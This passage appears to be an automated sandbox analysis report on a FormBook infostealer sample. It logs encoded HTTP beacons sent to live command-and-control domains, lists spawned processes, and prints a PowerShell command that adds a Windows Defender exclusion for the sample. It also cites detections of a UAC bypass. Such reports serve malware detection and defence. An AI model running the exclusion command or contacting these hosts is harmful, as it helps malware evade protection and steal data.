BooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+ [TRUNCATED]
Jun 6, 2024 13:28:53.337840080 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:28:53 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49789	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:55.215828896 CEST	482	OUT	GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:28:55.885118008 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:28:55 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49790	57.151.38.169	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:29:00.935368061 CEST	750	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 42 68 72 63 48 62 67 77 66 32 6c 4a 52 31 72 42 47 47 52 7a 31 4e 52 30 55 79 69 5a 66 64 4d 67 66 67 3d 3d Data Ascii: l65lvjLx=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXBhrcHbgwf2lJR1rBGGRz1NR0UyiZfdMgfg==
Jun 6, 2024 13:29:01.598417044 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:29:01 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49791	57.151.38.169	80

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:29:03.871691942 CEST	770	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 31 48 4a 31 72 74 53 65 78 70 45 70 79 4b 36 78 55 66 52 34 58 2b 4f 61 72 59 6d 4f 38 77 70 69 73 3d Data Ascii: l65lvjLx=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknN1HJ1rtSexpEpyK6xUfR4X+OarYmO8wpis=
Jun 6, 2024 13:29:04.529423952 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:29:04 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49792	57.151.38.169	80

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:29:06.411331892 CEST	10852	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 32 31 2b 55 6e 2f 2f 42 7a 34 51 39 75 78 59 58 48 66 55 53 65 4e 32 4c 61 36 50 2f 55 4d 6e 45 63 66 7a 45 59 2b 4d 2f 64 63 6a 34 56 31 4a 73 56 46 33 68 43 77 58 45 65 53 50 39 47 38 63 39 55 47 48 77 38 41 4e 51 2b 41 47 77 72 6c 62 53 4f 78 30 72 43 63 76 7a 57 2b 67 70 6a 34 6a 76 67 54 55 49 70 49 39 38 66 6e 35 51 6b 79 56 34 75 6d 4f 45 45 37 63 36 48 4b 54 33 49 64 45 52 69 54 4b 4b 45 71 4d 54 63 4b 71 44 6f 65 65 73 6d 4d 4f 54 2f 67 72 73 56 78 78 52 44 6b 52 4b [TRUNCATED] Data Ascii: l65lvjLx=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5OFm9VPsHDzhp/BOq9a2c5G+MhBmzS5GcRpCwIaK5ZkFtrvcMGKI5N3dZSFNAMAU0a7ctYCQ0rLDuCZDx3UDbAWmfsAPqIVwTMFzmCzuh12Yu0XdtjBC0OaBx6xGL4IS21+Un//Bz4Q9uxYXHfUSeN2La6P/UMnEcfzEY+M/dcj4V1JsVF3hCwXEeSP9G8c9UGHw8ANQ+AGwrlbSOx0rCcvzW+gpj4jvgTUIpI98fn5QkyV4umOEE7c6HKT3IdERiTKKEqMTcKqDoeesmMOT/grsVxxRDkRK/9uS5McNu24f5Oh6xP3M+yzd5yLAcBtRZPhxiAR8JMMddaXwrcUZh8t45pwso/pb9LqRD62oKM4mHmatekqATO/7g1+x1UAL/Cj+YfOqiS1uEc0DwSGqBVYzyDqPfLqEWjL57+szTki5Dy79py+ZfiQ2+xZTn/mhwy7DEuC9wbtlNdZaC5SH1m0aA+eY44qdghPqXpl1O7aYEP5EUrbiEObf3hDyM4HP0f0K0vPvc8u/DyryQ7K+7ElctIKBQgE/rmSpyl5XucGbuMN9uKBpzdgPIMQcELwuTr3wdivZZmUZIOo1BhQMQc8GBDHI38/15DaaYZ/XAtr2BcTDRyEOuczbivRN0iGlCexnsGIAqujqpk50V8vSt5UdhjYo483hhRuJWwIPFPO0WixevAZVAPGzCyk5bDwFYXtIlVGbOf6h7WEj/rRBVBxejRETLpxfXOAyK6dz2BIQHhewvmdodHJnWOz6MYSJ07hfwh5iNNZ7f4A9YycstJFZCRosfR40DuV7AnRPzFYPqxzQd+X9IkBQBDhM5LMK22ChZ0WLQ6thdH4LK+XtGVnpvHRwKb6s2lj4szBNwJiGK7h0TZOU1tc5IONnw7a7EQm/bYKr+p50SR6A3ahIUJAdyz0auO8VwDOwaRgV+/FxMiJ7/+beZnY9w5gJKYyheU [TRUNCATED]
Jun 6, 2024 13:29:07.085630894 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:29:07 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49793	57.151.38.169	80

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:29:08.950222969 CEST	484	OUT	GET /mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:29:09.618510008 CEST	497	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:29:09 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49794	162.241.216.140	80

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:29:14.686695099 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: l65lvjLx=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 6, 2024 13:29:15.352900982 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:29:15 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Target ID:	0
Start time:	07:24:55
Start date:	06/06/2024
Path:	C:\Users\user\Desktop\eNXDCIvEXI.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\eNXDCIvEXI.exe"
Imagebase:	0x21bf5ea0000
File size:	774'153 bytes
MD5 hash:	1F11421FDE0376D3FDB2D23041DB6ED5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:24:59
Start date:	06/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:24:59
Start date:	06/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:24:59
Start date:	06/06/2024
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\regedit.exe"
Imagebase:
File size:	370'176 bytes
MD5 hash:	999A30979F6195BF562068639FFC4426
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:25:00
Start date:	06/06/2024
Path:	C:\Windows\System32\calc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\calc.exe"
Imagebase:
File size:	27'648 bytes
MD5 hash:	5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:25:00
Start date:	06/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Imagebase:	0xeb0000
File size:	40'880 bytes
MD5 hash:	EF2DCDFF05E9679F8D0E2895D9A2E3BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:25:00
Start date:	06/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Imagebase:
File size:	40'880 bytes
MD5 hash:	EF2DCDFF05E9679F8D0E2895D9A2E3BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:25:00
Start date:	06/06/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7344 -s 1632
Imagebase:	0x7ff7e9f40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:25:03
Start date:	06/06/2024
Path:	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe"
Imagebase:	0x6b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
